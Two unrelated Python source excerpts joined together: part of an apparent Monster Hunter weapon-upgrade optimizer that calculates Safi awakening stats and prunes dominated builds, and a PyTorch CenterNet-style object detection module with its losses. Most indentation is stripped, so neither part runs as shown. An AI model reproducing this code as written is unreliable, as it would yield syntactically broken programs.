# level = 1 2 3 4 5 6
_ATTACK_VALUES = (None, None, None, 7, 9, 14) # Raw added to the weapon raw. Other levels not yet implemented.
_AFFINITY_VALUES = (None, None, None, 8, 10, 15) # Added affinity percentage. Other levels not yet implemented.
_SLOT_VALUES = (None, None, 1, 2, 3, 4 ) # The level of the slot. Slot I and II don't exist.
_SHARPNESS_VALUES = (None, None, None, 40, 50, 70) # Sharpness value added. Other levels not yet implemented.
_WHITE_MAX = 120 # Maximum white sharpness value before we overflow into purple sharpness.
_BASE_SHARPNESS = MaximumSharpness(100, 50, 50, 50, 50, 90, 0) # All Safi weapons start at this sharpness.
_MAXIMIZED_CONFIG_REGULAR_PICKS = [ # TODO: Consider automating this definition.
(SafiWeaponStandardUpgradeType.ATTACK, 5),
(SafiWeaponStandardUpgradeType.AFFINITY, 5),
(SafiWeaponStandardUpgradeType.SHARPNESS, 5),
(SafiWeaponStandardUpgradeType.SLOT, 5),
]
_MAXIMIZED_CONFIG_LEVEL_6_PICKS = [ # TODO: Consider automating this definition.
(SafiWeaponStandardUpgradeType.ATTACK, 6),
(SafiWeaponStandardUpgradeType.AFFINITY, 6),
(SafiWeaponStandardUpgradeType.SHARPNESS, 6),
(SafiWeaponStandardUpgradeType.SLOT, 6),
]
_MAXIMIZED_CONFIG_SET_BONUS_PICKS = [(x, 1) for x in SafiWeaponSetBonusUpgradeType]
def __init__(self):
self._config = []
assert self._state_is_valid()
return
def copy(self):
new = copy(self)
new._config = copy(self._config)
assert new._state_is_valid()
return new
def get_config(self):
return copy(self._config)
def get_serialized_config(self):
assert self._state_is_valid()
json_serializable = [(upgrade_type.name, level) for (upgrade_type, level) in self._config]
return json.dumps(json_serializable)
def calculate_contribution(self):
assert self._state_is_valid() # We rely on these assumptions. E.g. only one set bonus upgrade.
added_attack_power = 0
added_raw_affinity = 0
extra_decoration_slot_level = 0
added_sharpness_value = 0 # We turn this into new_max_sharpness_values once we have it.
set_bonus = None
for (upgrade_type, level) in self._config:
if upgrade_type is SafiWeaponStandardUpgradeType.ATTACK:
added_attack_power += self._ATTACK_VALUES[level - 1]
elif upgrade_type is SafiWeaponStandardUpgradeType.AFFINITY:
added_raw_affinity += self._AFFINITY_VALUES[level - 1]
elif upgrade_type is SafiWeaponStandardUpgradeType.SLOT:
extra_decoration_slot_level += self._SLOT_VALUES[level - 1]
elif upgrade_type is SafiWeaponStandardUpgradeType.SHARPNESS:
added_sharpness_value += self._SHARPNESS_VALUES[level - 1]
elif isinstance(upgrade_type, SafiWeaponSetBonusUpgradeType):
assert set_bonus is None
set_bonus = SetBonus[upgrade_type.value.set_bonus_name]
else:
raise RuntimeError("Not a valid Safi upgrade type.")
# Now, we calculate sharpness
assert SHARPNESS_LEVEL_NAMES[5] == "White"
assert SHARPNESS_LEVEL_NAMES[6] == "Purple"
assert len(SHARPNESS_LEVEL_NAMES) == 7
white_value = self._BASE_SHARPNESS[5] + added_sharpness_value
purple_value = 0
if white_value > self._WHITE_MAX:
purple_value = white_value - self._WHITE_MAX
white_value = self._WHITE_MAX
new_max_sharpness_values = MaximumSharpness(
self._BASE_SHARPNESS[0],
self._BASE_SHARPNESS[1],
self._BASE_SHARPNESS[2],
self._BASE_SHARPNESS[3],
self._BASE_SHARPNESS[4],
white_value,
purple_value,
)
# We've calculated everything, so now we return.
ret = WeaponUpgradesContribution (
added_attack_power = added_attack_power,
added_raw_affinity = added_raw_affinity,
extra_decoration_slot_level = extra_decoration_slot_level,
new_max_sharpness_values = new_max_sharpness_values,
set_bonus = set_bonus,
)
return ret
def get_maximized_configs(self):
maximized_configs = []
it = product(
self._MAXIMIZED_CONFIG_LEVEL_6_PICKS,
self._MAXIMIZED_CONFIG_REGULAR_PICKS,
self._MAXIMIZED_CONFIG_REGULAR_PICKS,
self._MAXIMIZED_CONFIG_REGULAR_PICKS, # TODO: Make it so slot upgrades only work
self._MAXIMIZED_CONFIG_REGULAR_PICKS + self._MAXIMIZED_CONFIG_SET_BONUS_PICKS,
)
for tup in it:
config = list(tup)
if self._is_valid_configuration(config):
maximized_configs.append(config)
return maximized_configs
def update_with_config(self, selected_config):
self._config = copy(selected_config)
assert self._state_is_valid()
return
def update_with_serialized_config(self, serialized_config):
json_parsed_config = json.loads(serialized_config)
self._config = []
for (upgrade_type_str, level) in json_parsed_config:
if upgrade_type_str in SafiWeaponStandardUpgradeType.__members__:
upgrade_type = SafiWeaponStandardUpgradeType[upgrade_type_str]
elif upgrade_type_str in SafiWeaponSetBonusUpgradeType.__members__:
upgrade_type = SafiWeaponSetBonusUpgradeType[upgrade_type_str]
else:
raise RuntimeError("Unknown Safi upgrade type.")
self._config.append((upgrade_type, level))
assert self._state_is_valid() # We test for config validity here.
return
def to_str_debugging(self):
return ",".join(f"{k.name}_{v}" for (k, v) in self._config)
def _state_is_valid(self):
if len(self._config) > 5 or (not self._is_valid_configuration(self._config)):
return False
for (upgrade_type, level) in self._config:
if not (isinstance(upgrade_type, SafiWeaponStandardUpgradeType)
or isinstance(upgrade_type, SafiWeaponSetBonusUpgradeType)):
return False
return True
@classmethod
def _is_valid_configuration(cls, config_list):
assert len(config_list) <= 5
has_slot = False
has_set_bonus = False
has_level_6 = False
for (upgrade_type, level) in config_list:
if upgrade_type is SafiWeaponStandardUpgradeType.SLOT:
if has_slot:
return False
has_slot = True
elif isinstance(upgrade_type, SafiWeaponSetBonusUpgradeType):
if has_set_bonus:
return False
has_set_bonus = True
elif (level > 6) or (level < 1):
return False
elif level == 6:
if has_level_6:
return False
has_level_6 = True
return True
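# Worked example (made up, for illustration): the config
# [(ATTACK, 6), (ATTACK, 5), (AFFINITY, 5), (SLOT, 5), (TEOSTRA_ESSENCE, 1)]
# passes _is_valid_configuration(): exactly one level-6 awakening, one slot awakening and
# one essence. Adding a second SLOT entry, a second essence, or a second level-6 entry
# would make it return False.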
WeaponFinalValues = namedtuple(
"WeaponFinalValues",
[
"original_weapon", # The original weapon object
"true_raw",
"affinity",
"slots",
"set_bonus",
"skill",
"is_raw",
"maximum_sharpness",
"constant_sharpness",
],
)
# Calculates a weapon's final values based on all selected augments and upgrades.
def calculate_final_weapon_values(weapon, weapon_augments_tracker, weapon_upgrades_tracker):
assert isinstance(weapon, tuple) # TODO: Make a more specific type assertion.
assert isinstance(weapon_augments_tracker, WeaponAugmentTracker)
assert isinstance(weapon_upgrades_tracker, WeaponUpgradeTracker)
a_contrib = weapon_augments_tracker.calculate_contribution()
u_contrib = weapon_upgrades_tracker.calculate_contribution()
bloat_value = weapon.type.value.bloat
weapon_true_raw = weapon.attack / bloat_value
slots = weapon.slots \
+ ((a_contrib.extra_decoration_slot_level,) if (a_contrib.extra_decoration_slot_level > 0) else tuple()) \
+ ((u_contrib.extra_decoration_slot_level,) if (u_contrib.extra_decoration_slot_level > 0) else tuple())
assert all((x in {1,2,3,4}) for x in slots)
if u_contrib.new_max_sharpness_values is not None:
maximum_sharpness = u_contrib.new_max_sharpness_values
else:
maximum_sharpness = weapon.maximum_sharpness
tup = WeaponFinalValues(
original_weapon = weapon,
true_raw = weapon_true_raw + a_contrib.added_attack_power + u_contrib.added_attack_power,
affinity = weapon.affinity + a_contrib.added_raw_affinity + u_contrib.added_raw_affinity,
slots = slots,
set_bonus = u_contrib.set_bonus,
skill = weapon.skill,
is_raw = weapon.is_raw,
maximum_sharpness = maximum_sharpness,
constant_sharpness = weapon.constant_sharpness
)
return tup
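# A minimal usage sketch (not part of the original module). It simply grabs an arbitrary
# entry from weapon_db, so it assumes the database is non-empty and the numbers printed
# depend on whichever weapon comes back.
def _example_final_values():
    weapon = next(iter(weapon_db.values()))
    augments = WeaponAugmentTracker.get_instance(weapon)
    upgrades = WeaponUpgradeTracker.get_instance(weapon)
    values = calculate_final_weapon_values(weapon, augments, upgrades)
    print(values.true_raw, values.affinity, values.slots)
    return values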
# Decides if w1 supercedes w2.
def _weapon_combo_supercedes(w1, w2):
assert isinstance(w1, WeaponFinalValues)
assert isinstance(w2, WeaponFinalValues)
# STAGE 1: We first decide if w1 has any values less than w2.
if w1.true_raw < w2.true_raw:
return False
if w1.affinity < w2.affinity:
return False
# The logic of this slots thing is a little complex. Here are some examples of how it works!
# Let's assume left is w1 and right is w2.
# [3,3] [1] --> continue since w1 is clearly better.
# [1] [3,3] --> return False since (1 < 3) for the first element evaluates True.
# [4,1,1] [3,3] --> return False since (1 < 3) for the second element evaluates True.
# To explain that last example, we can't guarantee that the [3,3] jewels can be fit into [4,1,1],
# hence we cannot prune away w2.
w1_slots = sorted(list(w1.slots), reverse=True)
w2_slots = sorted(list(w2.slots), reverse=True)
assert (len(w1_slots) == 0) or (w1_slots[0] >= w1_slots[-1]) # Sanity check that it's in descending order.
assert (len(w2_slots) == 0) or (w2_slots[0] >= w2_slots[-1]) # Sanity check that it's in descending order.
if any((w1_slot < w2_slot) for (w1_slot, w2_slot) in zip_longest(w1_slots, w2_slots, fillvalue=0)):
return False
# We can explain this through truth tables:
# | w2=None | w2=setbonusA | w2=setbonusB
# -------------|----------|--------------|--------------
# w1=None | continue | return False | return False
# w1=setbonusA | continue | continue | return False
# w1=setbonusB | continue | return False | continue
# -------------|----------|--------------|--------------
# So, we only continue if w2 is None, or the set bonuses are the same.
if (w2.set_bonus is not None) and (w1.set_bonus is not w2.set_bonus):
return False
# For now, we just group everything by whether they are raw or not.
# Any pair where one is raw and one isn't cannot supercede each other.
if w1.is_raw != w2.is_raw:
return False
# We just return if any sharpness level in w1 has fewer hits than in w2.
assert len(w1.maximum_sharpness) == len(w2.maximum_sharpness)
if any((s1 < s2) for (s1, s2) in zip(w1.maximum_sharpness, w2.maximum_sharpness)):
return False
# STAGE 2: We now decide if w1 has anything better than w2.
if w1.true_raw > w2.true_raw:
return True
if w1.affinity > w2.affinity:
return True
# The same as in stage 1, but the other way around!
if any((w1_slot > w2_slot) for (w1_slot, w2_slot) in zip_longest(w1_slots, w2_slots, fillvalue=0)):
return True
# For set bonuses, let's have a look at the remaining options:
# | w2=None | w2=setbonusA | w2=setbonusB
# -------------|-------------|--------------|--------------
# w1=None | continue | |
# w1=setbonusA | return True | continue |
# w1=setbonusB | return True | | continue
# -------------|-------------|--------------|--------------
# So, we will now continue only if both weapons have the same set bonus.
if w1.set_bonus is not w2.set_bonus:
return True
# We don't deal with is_raw. That has already been dealt with for us.
# This one is also similar to stage 1, but the other way around :)
if any((s1 > s2) for (s1, s2) in zip(w1.maximum_sharpness, w2.maximum_sharpness)):
return True
# STAGE 3: The two weapons are effectively the same.
return None
# Returns a list of tuples (weapon, augments_tracker, upgrades_tracker)
def get_pruned_weapon_combos(weapon_class, health_regen_minimum):
weapon_combinations = []
for (_, weapon) in weapon_db.items():
if weapon.type is not weapon_class:
continue # We ignore weapons that don't match our desired weapon class.
for augments_tracker in WeaponAugmentTracker.get_maximized_trackers(weapon, health_regen_minimum=health_regen_minimum):
for upgrades_tracker in WeaponUpgradeTracker.get_maximized_trackers_pruned(weapon):
precalculated_values = calculate_final_weapon_values(weapon, augments_tracker, upgrades_tracker)
weapon_combinations.append(((weapon, augments_tracker, upgrades_tracker), precalculated_values))
# Now, we prune!
def left_supercedes_right(weapon1, weapon2):
return _weapon_combo_supercedes(weapon1[1], weapon2[1])
if __debug__:
fordump_before = weapon_combinations
progress = ExecutionProgress(f"PRUNING WEAPONS -", len(weapon_combinations), granularity=1000)
weapon_combinations = prune_by_superceding(weapon_combinations, left_supercedes_right, \
execute_per_iteration=lambda : progress.update_and_log_progress(logger))
if __debug__:
fordump_after = weapon_combinations
dump_pruned_weapon_combos(fordump_before, fordump_after, left_supercedes_right)
weapon_combinations = [x[0] for x in weapon_combinations]
return weapon_combinations
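# A minimal usage sketch (not part of the original module); it assumes weapon_db is
# non-empty and borrows the weapon class of its first entry.
def _example_pruned_combos():
    some_class = next(iter(weapon_db.values())).type
    combos = get_pruned_weapon_combos(some_class, health_regen_minimum=0)
    for (weapon, augments, upgrades) in combos[:3]:
        print(weapon.name, augments.to_str_debugging(), upgrades.to_str_debugging())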
def get_weapon_config_humanreadable(linebegin, weapon, weapon_augments_tracker, weapon_upgrades_tracker):
buf = []
buf.append(linebegin + weapon.name)
buf.append("")
for (augment, level) in weapon_augments_tracker.get_config():
buf.append(f"{linebegin}{augment.name} {level}")
# TODO: Let the tracker print itself.
if isinstance(weapon_upgrades_tracker, IBCWeaponUpgradeTracker):
for (stage, upgrade) in enumerate(weapon_upgrades_tracker.get_config()):
buf.append(f"{linebegin}Custom Upgrade: {upgrade.name} {stage+1}")
elif isinstance(weapon_upgrades_tracker, SafiWeaponUpgrades):
for (upgrade, level) in weapon_upgrades_tracker.get_config():
buf.append(f"{linebegin}Safi Awakening: {upgrade.name} {level}")
return "\n".join(buf)
|
<filename>nets/centernet2d.py<gh_stars>10-100
import torch
import torch.nn as nn
import torch.nn.functional as F
import utils.improc
import utils.misc
import utils.basic
import utils.geom
import utils.samp
import numpy as np
from utils.basic import print_
def compute_seg_loss(pred, pos, neg, balanced=True):
pos = pos.clone().reshape(-1)
neg = neg.clone().reshape(-1)
pred = pred.reshape(-1)
label = pos*2.0 - 1.0
a = -label * pred
b = F.relu(a)
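# the next line is the numerically stable form of log(1 + exp(a)) = softplus(a),
# i.e. binary cross-entropy with logits for labels in {-1, +1}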
loss = b + torch.log(torch.exp(-b)+torch.exp(a-b))
mask_ = (pos+neg>0.0).float()
if balanced:
pos_loss = utils.basic.reduce_masked_mean(loss, pos)
neg_loss = utils.basic.reduce_masked_mean(loss, neg)
balanced_loss = pos_loss + neg_loss
return balanced_loss
else:
loss_pos = loss[pos > 0]
loss_neg = loss[neg > 0]
loss = torch.cat([loss_pos, loss_neg], dim=0).mean()
return loss
def balanced_ce_loss(pred, gt, valid=None):
# pred is B x 1 x Y x X
pos = (gt > 0.95).float()
neg = (gt < 0.05).float()
if valid is None:
valid = torch.ones_like(pos)
label = pos*2.0 - 1.0
a = -label * pred
b = F.relu(a)
loss = b + torch.log(torch.exp(-b)+torch.exp(a-b))
pos_loss = utils.basic.reduce_masked_mean(loss, pos*valid)
neg_loss = utils.basic.reduce_masked_mean(loss, neg*valid)
balanced_loss = pos_loss + neg_loss
return balanced_loss
class ResidualBlock(nn.Module):
def __init__(self, in_planes, planes, norm_fn='group', stride=1):
super(ResidualBlock, self).__init__()
self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=3, padding=1, stride=stride)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, padding=1)
self.relu = nn.ReLU(inplace=True)
num_groups = planes // 8
if norm_fn == 'group':
self.norm1 = nn.GroupNorm(num_groups=num_groups, num_channels=planes)
self.norm2 = nn.GroupNorm(num_groups=num_groups, num_channels=planes)
if not stride == 1:
self.norm3 = nn.GroupNorm(num_groups=num_groups, num_channels=planes)
elif norm_fn == 'batch':
self.norm1 = nn.BatchNorm2d(planes)
self.norm2 = nn.BatchNorm2d(planes)
if not stride == 1:
self.norm3 = nn.BatchNorm2d(planes)
elif norm_fn == 'instance':
self.norm1 = nn.InstanceNorm2d(planes)
self.norm2 = nn.InstanceNorm2d(planes)
if not stride == 1:
self.norm3 = nn.InstanceNorm2d(planes)
elif norm_fn == 'none':
self.norm1 = nn.Sequential()
self.norm2 = nn.Sequential()
if not stride == 1:
self.norm3 = nn.Sequential()
if stride == 1:
self.downsample = None
else:
self.downsample = nn.Sequential(
nn.Conv2d(in_planes, planes, kernel_size=1, stride=stride), self.norm3)
def forward(self, x):
y = x
y = self.relu(self.norm1(self.conv1(y)))
y = self.relu(self.norm2(self.conv2(y)))
if self.downsample is not None:
x = self.downsample(x)
return self.relu(x+y)
class BasicEncoder(nn.Module):
def __init__(self, input_dim=3, stride=8, output_dim=128, norm_fn='batch', dropout=0.0):
super(BasicEncoder, self).__init__()
self.norm_fn = norm_fn
self.stride = stride
if self.norm_fn == 'group':
self.norm1 = nn.GroupNorm(num_groups=8, num_channels=64)
elif self.norm_fn == 'batch':
self.norm1 = nn.BatchNorm2d(64)
elif self.norm_fn == 'instance':
self.norm1 = nn.InstanceNorm2d(64)
elif self.norm_fn == 'none':
self.norm1 = nn.Sequential()
self.conv1 = nn.Conv2d(input_dim, 64, kernel_size=7, stride=2, padding=3)
self.relu1 = nn.ReLU(inplace=True)
self.in_planes = 64
self.layer1 = self._make_layer(64, stride=1)
self.layer2 = self._make_layer(96, stride=2)
self.layer3 = self._make_layer(128, stride=2)
self.layer4 = self._make_layer(128, stride=2)
self.conv2 = nn.Conv2d(128+128+96, output_dim, kernel_size=1)
# # output convolution
# if self.stride==4:
# # self.conv2 = nn.Conv2d(128+96, output_dim, kernel_size=1)
# else:
# self.conv2 = nn.Conv2d(128, output_dim, kernel_size=1)
self.dropout = None
if dropout > 0:
self.dropout = nn.Dropout2d(p=dropout)
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
elif isinstance(m, (nn.BatchNorm2d, nn.InstanceNorm2d, nn.GroupNorm)):
if m.weight is not None:
nn.init.constant_(m.weight, 1)
if m.bias is not None:
nn.init.constant_(m.bias, 0)
def _make_layer(self, dim, stride=1):
layer1 = ResidualBlock(self.in_planes, dim, self.norm_fn, stride=stride)
layer2 = ResidualBlock(dim, dim, self.norm_fn, stride=1)
# layer3 = ResidualBlock(dim, dim, self.norm_fn, stride=1)
# layers = (layer1, layer2, layer3)
layers = (layer1, layer2)
self.in_planes = dim
return nn.Sequential(*layers)
def forward(self, x):
_, _, H, W = x.shape
x = self.conv1(x)
x = self.norm1(x)
x = self.relu1(x)
x = self.layer1(x)
x = self.layer2(x)
y = self.layer3(x)
z = self.layer4(y)
# print('x', x.shape)
# print('y', y.shape)
# print('z', z.shape)
x = F.interpolate(x, (H//self.stride, W//self.stride), mode='bilinear', align_corners=True)
y = F.interpolate(y, (H//self.stride, W//self.stride), mode='bilinear', align_corners=True)
z = F.interpolate(z, (H//self.stride, W//self.stride), mode='bilinear', align_corners=True)
x = self.conv2(torch.cat([x,y,z], dim=1))
if self.training and self.dropout is not None:
x = self.dropout(x)
return x
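# Shape sketch (illustrative numbers only): with stride=8, an input of shape
# (B, input_dim, 256, 256) passes conv1 at 128x128 and layer2/3/4 at 64/32/16, then every
# branch is resampled to 256//8 = 32, so the returned tensor is (B, output_dim, 32, 32).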
def _topk(objectness, K=10):
B, C, Z, X = list(objectness.shape)
assert(C==1)
scorelist, indlist = torch.topk(objectness.view(B, C, -1), K)
# indlist_z = indlist // (X)
indlist_z = torch.div(indlist, X, rounding_mode='trunc')
indlist_x = indlist % (X)
scorelist = scorelist.reshape(B, K)
indlist_z = indlist_z.reshape(B, K)
indlist_x = indlist_x.reshape(B, K)
xzlist = torch.stack([indlist_x, indlist_z], dim=2).float()
return scorelist, xzlist
def _nms(heat, kernel=11):
pad = (kernel - 1) // 2
hmax = F.max_pool2d(
heat, (kernel, kernel), stride=1, padding=pad)
keep = (hmax == heat).float() #* (hmax > 0.9).float()
return heat * keep
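# A minimal sketch of how the two helpers above combine (illustrative, not from the
# original training code): suppress non-peak responses, then read off the K strongest peaks.
def _example_peak_extraction():
    heat = torch.rand(2, 1, 64, 64)   # B x 1 x Z x X objectness map
    peaks = _nms(heat, kernel=11)     # zero out everything except local maxima
    scores, xz = _topk(peaks, K=5)    # scores: B x K, xz: B x K x 2 holding (x, z)
    return scores, xz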
class Centernet2d(nn.Module):
def _sigmoid(self, x):
y = torch.clamp(x.sigmoid_(), min=1e-4, max=1-1e-4)
return y
def __init__(self, Y=32, K=10, show_thresh=0.5, stride=8):
super(Centernet2d, self).__init__()
print('Centernet2d...')
self.stride = stride
Y_ = Y//self.stride
self.Y = Y
self.Y_ = Y_
self.K = K
self.thresh = show_thresh # only show/return boxes with this conf
self.num_rot_bins = 16
self.heading_unaware = True
if self.heading_unaware:
# for rotation, I have decided to be heading-unaware,
# so 0 and 180 degrees are treated as equivalent
bin_angles = np.linspace(0, np.pi, self.num_rot_bins, endpoint=False)
bin_complements = bin_angles + np.pi
all_bins = np.concatenate([bin_angles, bin_complements], axis=0)
all_inds = np.concatenate([np.arange(self.num_rot_bins), np.arange(self.num_rot_bins)], axis=0)
else:
all_bins = np.linspace(0, np.pi*2, self.num_rot_bins, endpoint=False)
all_inds = np.arange(self.num_rot_bins)
bin_angles = all_bins
self.bin_angles = torch.from_numpy(bin_angles).float().cuda()
self.all_bins = torch.from_numpy(all_bins).float().cuda()
self.all_inds = torch.from_numpy(all_inds).long().cuda()
obj_channels = 1
size_channels = 3
offset_channels = 4
rot_channels = self.num_rot_bins # just ry
seg_channels = Y_
self.output_channels = obj_channels + size_channels + offset_channels + rot_channels + seg_channels
self.net = BasicEncoder(input_dim=Y, stride=stride, output_dim=self.output_channels, norm_fn='instance', dropout=0)
self.mse = torch.nn.MSELoss(reduction='none')
self.smoothl1 = torch.nn.SmoothL1Loss(reduction='none')
def balanced_mse_loss(self, pred, gt, valid=None):
# pos_inds = gt.eq(1).float()
# neg_inds = gt.lt(1).float()
pos_mask = gt.gt(0.5).float()
neg_mask = gt.lt(0.5).float()
# utils.basic.print_stats('pos_mask', pos_mask)
# utils.basic.print_stats('neg_mask', neg_mask)
# utils.basic.print_stats('pred', pred)
# utils.basic.print_stats('gt', gt)
if valid is None:
valid = torch.ones_like(pos_mask)
mse_loss = self.mse(pred, gt)
pos_loss = utils.basic.reduce_masked_mean(mse_loss, pos_mask*valid)
neg_loss = utils.basic.reduce_masked_mean(mse_loss, neg_mask*valid)
loss = (pos_loss + neg_loss)*0.5
return loss
def compute_rot_loss(self, rot_prob, rot_g, valid):
# rot_prob is B x N x self.rot_bins
# rot_g is B x N, with angles in radians
# valid is B x N
B, N = list(rot_g.shape)
rot_prob = rot_prob.reshape(B*N, self.num_rot_bins)
valid = valid.reshape(B*N)
rot_g = rot_g.reshape(B*N, 1)
# i need to assign rot_g into bins
dist = utils.geom.angular_l1_dist(rot_g, self.all_bins.reshape(1, -1))
# this is B*N x num_rot_bins
min_inds = torch.argmin(dist, dim=1)
# this is B*N and long
# for safety, let's not parallelize the gather here
labels = torch.zeros(B*N).long().cuda()
for b in list(range(B*N)):
labels[b] = self.all_inds[min_inds[b]]
# print('labels', labels.detach().cpu().numpy())
# print('rot_prob', rot_prob.shape)
loss_vec = F.cross_entropy(rot_prob, labels, reduction='none')
# rather than take a straight mean, we will balance across classes
losses = []
for cls in list(range(self.num_rot_bins)):
mask = (labels==cls).float()
cls_loss = utils.basic.reduce_masked_mean(loss_vec, mask*valid)
if torch.sum(mask) >= 1:
# print('adding loss for rot bin %d' % cls)
losses.append(cls_loss)
total_loss = torch.mean(torch.stack(losses))
return total_loss
def forward(self, occ_feat, lrtlist_cam_g=None, scorelist_g=None, center_g=None, valid_g=None, pos_mem=None, neg_mem=None, vox_util=None, sw=None, force_export_boxlist=False, K=None):
total_loss = torch.tensor(0.0).cuda()
occ_mem = occ_feat.permute(0, 2, 1, 3).unsqueeze(1)
B, Y, Z, X = list(occ_feat.shape)
out_feat = self.net(occ_feat)
# print('out_feat', out_feat.shape)
Z8 = Z//self.stride
X8 = X//self.stride
Y8 = Y//self.stride
# pred = out_feat.reshape(B, self.Y8, self.output_channels, Z8, X8).permute(0, 2, 3, 1, 4) # B, C, Z, Y, X
# print('pred', pred.shape)
pred = out_feat.reshape(B, self.output_channels, Z8, X8) # B, C, Z, X
# dy, dx = utils.basic.gradient2d(pred, absolute=True)
# smooth_loss = torch.mean(dy+dx)
# total_loss += smooth_loss*0.01
center_e = pred[:,0:1]
center_e_sig = torch.sigmoid(center_e)
size_e = F.softplus(pred[:,1:4]) + 0.01
offset_e = pred[:, 4:7]
ycoord_e = pred[:, 7:8]
ry_e = pred[:, 8:8+self.num_rot_bins]
seg_e = pred[:, 8+self.num_rot_bins:].reshape(B, 1, Y8, Z8, X8).permute(0, 1, 3, 2, 4)
# print('center_e', center_e.shape)
# print('center_g', center_g.shape)
if lrtlist_cam_g is not None:
# assume other _g tensors are present
B2, N, D = list(lrtlist_cam_g.shape)
assert(B==B2)
assert(D==19)
seg_loss = compute_seg_loss(seg_e, pos_mem, neg_mem, balanced=True)
total_loss = utils.misc.add_loss('center2d/seg_loss', total_loss, seg_loss, 1.0, sw)
lrtlist_mem_g = vox_util.apply_mem_T_ref_to_lrtlist(lrtlist_cam_g, Z8, Y8, X8, assert_cube=False)
prob_loss = self.balanced_mse_loss(center_e_sig, center_g, valid_g)
total_loss = utils.misc.add_loss('center2d/prob_loss', total_loss, prob_loss, 1.0, sw)
clist_g = utils.geom.get_clist_from_lrtlist(lrtlist_mem_g)
# clist_g is B x N x 3
sizelist_g, rtlist_cam_g = utils.geom.split_lrtlist(lrtlist_cam_g) # note these are from cam, unlike centers
# sizelist_g, rtlist_cam_g = utils.geom.split_lrtlist(lrtlist_mem_g)
# print_('rylist_g', rylist_g)
rlist_, tlist_ = utils.geom.split_rt(rtlist_cam_g.reshape(B*N, 4, 4))
# compute ry using trigonometry
x_vec = torch.zeros((B*N, 3), dtype=torch.float32, device=clist_g.device)
x_vec[:, 2] = 1 # 0,0,1
x_rot = torch.matmul(rlist_, x_vec.unsqueeze(2)).squeeze(2)
rylist_g = torch.atan2(x_rot[:,0],x_rot[:,2]).reshape(B, N)
sizelist_e = utils.samp.bilinear_sample2d(size_e, clist_g[:,:,0], clist_g[:,:,2]).permute(0, 2, 1)
sizelist_diff = torch.sum(self.smoothl1(sizelist_e, sizelist_g), dim=2)
# this is B x N
size_loss = utils.basic.reduce_masked_mean(sizelist_diff, scorelist_g)
total_loss = utils.misc.add_loss('center2d/size_loss', total_loss, size_loss, 1.0, sw)
ycoordlist_e = utils.samp.bilinear_sample2d(ycoord_e, clist_g[:,:,0], clist_g[:,:,2]).permute(0, 2, 1)
ycoordlist_g = clist_g[:,:,1:2]
ycoordlist_diff = torch.sum(self.smoothl1(ycoordlist_e, ycoordlist_g), dim=2)
ycoord_loss = utils.basic.reduce_masked_mean(ycoordlist_diff, scorelist_g)
total_loss = utils.misc.add_loss('center2d/ycoord_loss', total_loss, ycoord_loss, 1.0, sw)
offsetlist_e = utils.samp.bilinear_sample2d(offset_e, clist_g[:,:,0], clist_g[:,:,2]).permute(0, 2, 1)
offsetlist_g = clist_g - torch.round(clist_g) # get the decimal part
offsetlist_diff = torch.sum(self.smoothl1(offsetlist_e, offsetlist_g), dim=2)
offset_loss = utils.basic.reduce_masked_mean(offsetlist_diff, scorelist_g)
total_loss = utils.misc.add_loss('center2d/offset_loss', total_loss, offset_loss, 1.0, sw)
rylist_e = utils.samp.bilinear_sample2d(ry_e, clist_g[:,:,0], clist_g[:,:,2]).permute(0, 2, 1)
ry_loss = self.compute_rot_loss(rylist_e, rylist_g, scorelist_g)
total_loss = utils.misc.add_loss('center2d/ry_loss', total_loss, ry_loss, 1.0, sw)
# now, let's convert the estimates into discrete boxes
# this means: extract topk peaks from the centerness map,
# and at those locations, extract the rotation and size estimates
center_e_clean = center_e_sig.clone()
center_e_clean = _nms(center_e_clean, kernel=15)
if sw is not None:
sw.summ_oned('center2d/center_e_clean', center_e_clean, norm=False)
scorelist_e, xzlist_mem_e = _topk(center_e_clean, K=self.K)
sizelist_e = utils.samp.bilinear_sample2d(size_e, xzlist_mem_e[:,:,0], xzlist_mem_e[:,:,1]).permute(0, 2, 1)
offsetlist_e = utils.samp.bilinear_sample2d(offset_e, xzlist_mem_e[:,:,0], xzlist_mem_e[:,:,1]).permute(0, 2, 1)
ycoordlist_e = utils.samp.bilinear_sample2d(ycoord_e, xzlist_mem_e[:,:,0], xzlist_mem_e[:,:,1]).permute(0, 2, 1)
rylist_e = utils.samp.bilinear_sample2d(ry_e, xzlist_mem_e[:,:,0], xzlist_mem_e[:,:,1]).permute(0, 2, 1)
# note that the predicted ycoord is in mem coords
xyzlist_mem_e = torch.stack([xzlist_mem_e[:,:,0],
ycoordlist_e[:,:,0],
xzlist_mem_e[:,:,1]], dim=2)
xyzlist_cam_e = vox_util.Mem2Ref(xyzlist_mem_e, Z8, Y8, X8, assert_cube=False)
# # fancy new idea:
# # at these peaks, apply another loss, using the nearest gt
# # e.g., we would like offsets away from the object to point to the object
# if (lrtlist_mem_g is not None):
# extra_size_loss = 0.0
# extra_offset_loss = 0.0
# extra_rot_loss = 0.0
# normalizer = 0.0
# for b in list(range(B)):
# for k in list(range(self.K)):
# xyz_e = xyzlist_mem_e[b:b+1, k]
# size_e = sizelist_e[b:b+1, k]
# offset_e = offsetlist_e[b:b+1, k]
# # these are 1 x 3
# # rx_e = rxlist_e[b:b+1, k]
# ry_e = rylist_e[b:b+1, k]
# # these are 1 x num_rot_bins
# # rz = rzlist_e[b:b+1, k]
# # these are 1 x 1
# xyz_g = clist_g[b:b+1]
# score_g = scorelist_g[b:b+1]
# xyz_g[score_g < 1.0] = 100000 # discard for mindist
# # this is 1 x N x 3
# dist = utils.basic.sql2_on_axis(xyz_g - xyz_e.unsqueeze(1), 2)
# # this is 1 x N
# ind = torch.argmin(dist, dim=1).squeeze()
# # print('ind', ind.detach().cpu().numpy(), ind.shape)
# xyz_g = clist_g[b:b+1,ind]
# size_g = sizelist_g[b:b+1,ind]
# score_g = scorelist_g[b:b+1,ind]
# mindist = dist[:,ind]
# # only proceed if the nn is valid, and not too far away
# if score_g.squeeze() == 1.0 and mindist.squeeze() < 8.0:
# # offset_g = offsetlist_g[b:b+1,ind]
# # for offset, we actually need to recompute
# offset_g = xyz_g - xyz_e
# # rx_g = rxlist_g[b:b+1,ind]
# ry_g = rylist_g[b:b+1,ind]
# # all the tensors of interest are 1x3, or 1xnum_bins for rots
# # extra_rot_loss += 0.5 * self.compute_rot_loss(rx_e.unsqueeze(1), rx_g.unsqueeze(1), torch.ones_like(rx_g.unsqueeze(1)))
